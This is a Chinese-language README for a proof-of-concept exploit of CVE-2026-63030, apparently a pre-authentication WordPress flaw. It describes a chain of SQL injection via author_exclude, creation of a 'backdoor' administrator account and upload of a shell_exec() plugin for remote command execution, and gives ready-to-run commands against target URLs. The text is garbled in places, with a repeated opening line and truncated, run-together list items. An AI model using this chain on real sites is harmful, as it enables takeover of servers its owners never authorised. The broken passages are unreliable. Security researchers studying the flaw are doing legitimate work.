
CVE-2026-63030 的概念验证漏洞利用程序,这是存在于 WordPress(6.9.0 至 7.0.1 版本)中的一个预认证漏洞。
针对 CVE-2026-63030 的概念验证漏洞利用,这是 WordPress(6.9.0 至 7.0.1 版本)中的一个预认证漏洞。它串联了:
author_exclude 参数进行的 SQL 注入python3 cve_2026_63030_exp.py --url http://target-wordpress.com/ --command "whoami"
| 参数 | 描述 |
|---|---|
--url | 目标 WordPress 根 URL(必填) |
--username | 要创建的管理员用户名(省略时自动生成) |
--password | 管理员密码(省略时自动生成) |
--email | 管理员邮箱(省略时自动生成) |
--command, -c | 通过插件执行的命令(默认:id) |
--post-id | 指定已发布文章 ID(省略时自动检测) |
--timeout | HTTP 超时时间(秒)(默认:60) |
# Auto-exploit with random admin credentials and run 'id'
python3 exploit.py --url http://192.168.1.100/wordpress/
# Custom admin and command
python3 exploit.py --url https://vuln-site.com/ --username backdoor --password 'H4ckMe!' --command 'ls -la /var/www/html'
author_exclude 参数的精心构造的批量请求,利用路由混淆执行 UNION 查询。shell_exec() 执行系统命令的最简插件。这仅是一个概念验证。
它旨在用于:
请勿将其用于你不拥有或未经明确书面授权测试的系统。作者对滥用不承担任何责任。
wp-config.php,SQLi 可能会失败。DISALLOW_FILE_MODS 和 DISALLOW_UNFILTERED_HTML。